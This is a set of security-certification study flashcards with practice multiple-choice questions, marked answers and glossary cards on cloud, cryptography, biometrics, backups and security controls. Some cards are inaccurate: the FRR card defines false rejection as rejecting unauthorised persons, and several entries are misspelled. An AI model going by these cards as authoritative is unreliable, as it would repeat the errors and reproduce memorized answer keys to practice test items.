Chap 2-71: Which of the following is the most important benefit from using an SDN?
It will stop malware
It provides scalability
It will detect intrusions
It will prevent session hijacking
It provides scalability
130
SDN
Software Defined Networking; makes the network very scalable
131
Chap 2-72: Mark is an administrator for a health company. He has to support an older, legacy application. He is concerned that this legacy application might have vulnerabilities that would affect the rest of the network. What is the most efficient way to mitigate this?
Use an application container
Implement an SDN
Run the application on a separate VLAN
Insist on an updated version of the application
Run the application on a separate VLAN
132
Chap 2-74: Valerie is considering deploying a cloud access security broker. What sort of tool is she looking at?
A system that implements mandatory access control on cloud infrastructure
A tool that sits between cloud users and applications to monitor activity and enforce policies
A tool that sites between cloud application providers and customers to enforce web application security policies
A system that implements discretionary access control on cloud infrastructure
A tool that sits between cloud users and applications to monitor activity and enforce policies
133
Cloud Access Security Broker (CASB)
Used to monitor cloud activity and usage and to enforce security policies on users of cloud services.
According to Gartner, a cloud access security broker (CASB) is an on-premises or cloud-based security policy enforcement point that is placed between cloud service consumers and cloud service providers to combine and interject enterprise security policies as cloud-based resources are accessed. Think of the CASB as the sheriff that enforces the laws set by the cloud service administrators.
134
Chap 2-85: What term is used to describe encryption that can permit computations to be conducted on ciphertext, with the results matching what would have occurred if the same computations were performed on the original plain text?
Identity perserving encryption
Homomorphic encryption
Replicable encryption
None of the above
Homomorphic encryption
135
Homomorphic encryption
Homomorphic encryption is the conversion of data into ciphertext that can be analyzed and worked with as if it were still in its original form. Homomorphic encryption enables complex mathematical operations to be performed on encrypted data without compromising the encryption.
136
SoC
System on a Chip, self contained system on a single chip
137
SED
Self Encrypting Drive
138
RFC
Request for Comments;
RFC documents contain technical specifications and organizational notes for the Internet
A Request for Comments (RFC) is a publication in a series from the principal technical development and standards-setting bodies for the Internet, most prominently the Internet Engineering Task Force (IETF). An RFC is authored by individuals or groups of engineers and computer scientists in the form of a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. It is submitted either for peer review or to convey new concepts, information, or, occasionally, engineering humor.
139
Chap 2-95: Using standard naming conventions provides a number of advantages. Which of the following is not an advantage of using a naming convention?
It can help administrators determine the function of a system
It can help administrators identify misconfigured or rogue systems
It can help conceal a system from an attacker
It can make scripting easier
It can help conceal a system from an attacker
140
Gait Analysis
Gait analysis is an assessment of the way the body moves, usually by walking or running, from one place to another.
141
Community Cloud
Compromise solution; Community clouds are semi-private; not accessible to general public, but only to a small community of specific entities.
The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises.
142
Chap 2-98: Your company is interested in keeping data in the cloud. Management feels that public clouds are not secure but is concerned about the cost of a private cloud. What is the solution you would recommend?
Tell them there no risks in the public cloud
Tell them they will have to find a way to budget for a private cloud
Suggest that they consider a community cloud
Recommend against a cloud solution at this time
Suggest that they consider a community cloud
143
Chap 2-101: Madhuri has configured a backup that will back up all of the changes to a system since the last time that a full backup occurred. What type of backup has she set up?
A snapshot
A full backup
An incremental backup
A differential
A differential
144
Incremental Backup
Backs up all changes since last incremental backup
145
Differential Backup
backs up all changes since last full backup
146
Chap 1-103: What is the point where false acceptable rate and false rejection rate cross over in a biometric system?
CRE
FRE
CER
FRR
CER - crossover error rate
147
CER - Crossover Error Rate
point where the FAR and FRR cross over
148
FAR - False acceptance Rate
the percentage of identification instances in which unauthorized persons are incorrectly accepted.
False Acceptance (aka false positive) is called a Type 1 error; worse than type 2
149
FRR - False rejection Rate
the percentage of identification instances in which unauthorised persons are incorrectly rejected.
False rejection is a called a Type 2 error
150
MSSP
Managed Security Service Provider
151
Chap 2-114: Gordon knows that regression testing is important but wants to prevent old versions of code from being re-inserted into new releases. What process should he use to prevent this?
Continuous Integration
Version Numbering
Continuous Deployment
Release Management
Version Numbering
152
Chap 2-115: Mia a network administrator for a bank. She is responsible for secure communications with her company's website. Which of the following would be the best for her to implement?
SSL
PPTP
IPSec
TLS
TLS
153
PPTP
Point-2-Point Tunnel Protocol; The Point-to-Point Tunneling Protocol (PPTP) is an obsolete method for implementing virtual private networks. PPTP has many well known security issues.
154
IPSec
IPSec is a set of communication rules or protocols for setting up secure connections over a network. Internet Protocol (IP) is the common standard that determines how data travels over the internet. IPSec adds encryption and authentication to make the protocol more secure.
Used in VPN
155
Chap 2-116: Which of the following is not a common challenge with smartcard-based authentication systems?
Weaker security due to the limitations of the smartcard's encryption support
Added expense due to card readers, distribution and software installation
Weaker user experience due to the requirement to insert the card for every authentication
Lack of security due to possession of the card being the only factor used
Weaker security due to the limitations of the smartcard's encryption support
Smartcards support modern cryptographic standards, meaning weak security due to a smartcard's limitations on encryption is not an issue
156
XaaS
Anything as a Service
157
MOU
memorandum of understanding. - a document that describes the broad outlines of an agreement that two or more parties have reached.
158
TOTP
Time Based One Time Password (Authy, Google Authenticator)
159
HOTP
The “H” in HOTP stands for Hash-based Message Authentication Code (HMAC). Put in layman’s terms, HMAC-based One-time Password algorithm (HOTP) is an event-based OTP where the moving factor in each code is based on a counter.
Each time the HOTP is requested and validated, the moving factor is incremented based on a counter. The code that’s generated is valid until you actively request another one and it’s validated by the authentication server. The OTP generator and the server are synced each time the code is validated and the user gains access. Yubiko’s Yubikey is an example of an OTP generator that uses HOTP.
160
Chap 2-123: The company that Nina works for has suffered from recent thefts of packages from a low security delivery area. What type of camera capability can they use to ensure that a recently delivered package is properly monitored?
Infrared image capture
Motion detection
Object detection
Facial detection
Object detection
161
Chap 2-124: Which of the following is not a common organizational security concern for wearable devices?
A GPS location data exposure
Data exposure
User health data exposure
Insecure wireless connectivity
User health data exposure
162
Chap 1-126: You are working for a large company. You are trying to find a solution that will provide controlled physical access to the building and record every employee who enters the building. Which of the following would be the best for you to implement?
A security guard with a sign in sheet
Smartcard access using electronic locks
A camera by the entrance
A sign-in sheet by the front door
Smartcard access using electronic locks
163
NIC Teaming
Network Interface Card (NIC) teaming is a common technique of grouping physical network adapters to improve performance and redundancy (aka fault tolerance)
164
Chap 2-131: Molly is implementing biometrics in her company. Which of the following should be her biggest concern?
FAR
FRR
CER
EER
FAR
165
EER
Equal Error Rate, same as Crossover Error Rate; point where FAR and FRR crossover
166
Chap 2-132: Mike is concerned about data sovereignty for data that his organization captures and maintains. What best describes his concern?
Who owns the data that is captured on systems hosted in a cloud provider's infrastructure?
Can Mike's organization make decisions about data that is part of its service, or does it belong to users?
Is the data located in a country subject to the laws of the country where it is stored?
Does data have rights on its own, or does the owner of the data determine what rights may apply to it?
Is the data located in a country subject to the laws of the country where it is stored?
167
Chap 1-133: What are the key limiting factors for cryptography on low-power devices?
There are system limitations on CPU, memory and storage
The devices cannot support public key encryption due to an inability to factor prime numbers
There is a lack of chipset support for encryption
Legal limitations for low power devices prevent encryption from being supported
There are system limitations on CPU, memory and storage
168
Chap 2-134: Fred is responsible for physical security at his company. He wants to find a good way to protect the USB thumb drives that have BitLocker keys stored on them. Which of the following would be the best solution for this situation?
Store the drives in a secure cabinet or safe
Encrypt the thumb drives
Dont store BitLocker keys on these drives
Lock the thumb drives in a desk drawer
Store the drives in a secure cabinet or safe
169
Chap 2-137: What is the primary threat against static codes used for multifactor authentication?
Brute Force
Collisions
Theft
Clock mismatch
Theft
170
Chap 1-139: The company that Devin works for has selected a nondescript building and does not use exterior signage to advertise that the facility belongs to them. What physical security term describes this type of security control?
Industrial camouflage
Demilitarized zone
Industrial obfuscation
Disruptive colorization
Industrial Camouflage
171
Chap 2-141: When you are concerned about application security, what is the most important issue in memory management?
Never allocate a variable any larger than needed
Always check the bounds on an array
Always declare a variable where you need it (i.e., at function or file level if possible)
Make sure you release any memory you allocate
Make sure you release any memory you allocate
172
Chap 2-146: Social login, the ability to use an existing identity from a site like Google or Facebook, or a Microsoft account, is an example of which of the following concepts?
Federation
AAA
Privilege creep
Identity and access management
Federation
173
Federation
Federated identity is a method of linking a user's identity across multiple separate identity management systems.
174
Chap 2-148: Which cloud service model provides the customer with the infrastructure to create applications and host them?
SaaS
PaaS
IaaS
IDaaS
PaaS
175
Chap 2-149: Why is avoiding the initialization vector and key reuse recommended to ensure secure encryption?
It makes it impossible to brute force
It means a single successful attack will not expose multiple messages
It means a single successful attack will not expose any messages
It makes brute force easier
It means a single successful attack will not expose multiple messages
176
Initialization vector
An initialization vector (IV) is an arbitrary number that can be used with a secret key for data encryption to foil cyber attacks. This number, also called a nonce (number used once), is employed only one time in any session to prevent unauthorized decryption of the message by a suspicious or malicious actor.
177
Detective Control
identifies security threats that have already occurred; e.g.: intrusion detection system, IDS
178
What are the types of controls?
Preventative
Detective
Corrective
Deterrent
Physical
Compenstation
179
Deterrent Control
seek to prevent an attacker from attempting to violate security policies; e.g.: guard dogs, barbed wire fences
180
Compensating Control
designed to mitigate the risk associated with exceptions made to the security policy
181
Preventive Control
intend to stop a security issue before it occurs. e.g.: firewalls and encryption
182
Edge Computing
Edge Computing places both data storage and computation power closer to where it is needed to save on bandwidth and to improve the response of associated applications and services.
183
Chap 2-154: Ben replaces sensitive data in his database with unique identifiers. The identifiers allow him to continue to take actions on the data without exposing the data itself. What type of solution has he deployed?
Masking
Encryption
Hashing
Tokenization
Tokenization
184
Tokenization
Is the process of replacing sensitive data with unique identification symbols that retain all the essential information (e.g.: length and data type) about the data without compromising its security
185
Masking
Modifies content to conceal PII or other sensitive information
186
Chap 2-156: What additional capabilities does adding a digital signature to an encrypted message provide?
Integrity and nonrepudiation
Confidentiality and integrity
Availability and nonrepudiation
Confidentiality and availability
Integrity and nonrepudiation
187
Chap 2-157: Megan has been asked to set up period attestation process for accounts in her organization. What has she been asked to do?
Validate that the users are still employed
Validate that the users' rights and permissions are still correct
Require users provide proof of identity
Validate security controls as part of the test
Validate that the users' rights and permissions are still correct
Attestation processes request responsible managers or other individuals to validate that user entitlements or privileges are correct and match those that the user should have
188
Chap 2-159: What does the Message Authentication Code (MAC) do when used as part of a cryptographic system?
It validates the message's integrity and authenticity
It validates the message's confidentiality and authenticity
It protects the message's integrity and authenticity
None of the Above
It validates the message's integrity and authenticity
189
Message Authentication Code (MAC)
also referred to as a tag, is used to authenticate the origin and nature of a message. MACs use authentication cryptography to verify the legitimacy of data sent through a network or transferred from one person to another.
190
Chap 2-160: Charles wants to put a fire suppression system in place in an area where highly sensitive electronics are in use. What type of fire suppression system is best suited to this type of environment if Charles is concerned about potential harm to first responders or on-site staff?
Pre-charge
Dry pipe
Inert gas
Carbon Dioxide
Inert gas
Dry Pipe and Pre-charge use water which can hurt electronics
191
PDU
Power Distribution Unit, used to manage and distribute power
192
Corrective Controls
remediate security events that have already occurred. e.g.: restoring backups after a ransomware attack
193
Physical Controls
controls that impact the physical world. e.g.: fences, perimeter lighting, locks, fire suppression systems and burglar alarms
194
Chap 2-162: Hows does asymmetric encryption support nonrepudaition?
Using digital signatures
Using longer keys
Using reversible hashes
Using the recipient's public key
Using digital signatures
195
Chap 2-163: Olivia knows that she needs to consider geography as part of her security considerations. Which of the following is a primary driver of geographical considerations for security?
MTR
Natural Disasters
Service integration
Sprawl Avoidance
Natural Disasters
196
MTR
maximun time to restore
197
Chap 2-169: Gabby wants to ensure that sensitive data can be transmitted in unencrypted form by using physical safeguards. What type of solution should she implement
Shielded cables
Armored cables
Distribution lockdown
Protected cable distribution
Protected cable distribution
Protected cable distribution uses such controls as electrical, electromagnetic, and even acoustic or air pressure sensors to ensure that cables and distribution infrastructure are not accessed, allowing sensitive information to be transmitted in unencrypted form
198
Chap 2-172: John wants to protect data at rest so that he can process it and use it as needed in its original form. What solution from the following is best suited to this requirement?
Hashing
TLS
Encryption
Tokenization
Encryption
199
Chap 2-175: Isaac wants to use on-premise cloud computing. What term describes this type of cloud computing solution?
Infrastructure as a Service
Hybrid cloud
Private cloud
Platform as a Service
Private cloud
200
Chap 2-178: Charles has configured his multifactor system to require both a PIN and a password. How many effective factors does he have in place once he presents both of these and his username?
1
2
3
4
1
Although it may seem like Charles has presented two factors, in fact he has only presented two types of things he knows along with his identity. To truly implement a multi-factor environment, he should use more than one of:
- something you have
- something you know
- something you are
201
Multi-factor attributes
Something you know
Something you have
Something you are
Somewhere you are
Something you can do
Something you exhibit
Someone you know
202
Chap 2-186: Yasmine wants to ensure that she met a geographic dispersal requirement for her data centers. How far away should she place her datacenter based on common best practices for dispersal?
12 miles
105 miles
3000 miles
45 miles
105 miles
Recommendation is between 60 to 120 miles apart to prevent multiple data centers from being hit by the same natural disaster
203
Chap 2-186: What term describes extending cloud computing to the edge of an enterprise network?
Local cloud
Fog computing
Managed cloud
Blade computing
Fog computing
204
Fog Computing
Extending cloud computing to the edge of an enterprise network. Coined by Cisco
Sometimes known as Edge computing
Fog computing or fog networking, also known as fogging, is an architecture that uses edge devices to carry out a substantial amount of computation (edge computing), storage, and communication locally and routed over the Internet backbone.
205
Chap 2-188: Which of the following algorithms is a key stretching algorithm?
bcrypt
ncrypt
MD5
SHA1
bcrypt
206
Security Control Categories
Technical
Operational
Managerial
207
AAA
Authentication, Authorization and Accounting
208
RADIUS
uses UDP and encrypts the password only
209
TACACS+
uses TCP and encrypts the entire session
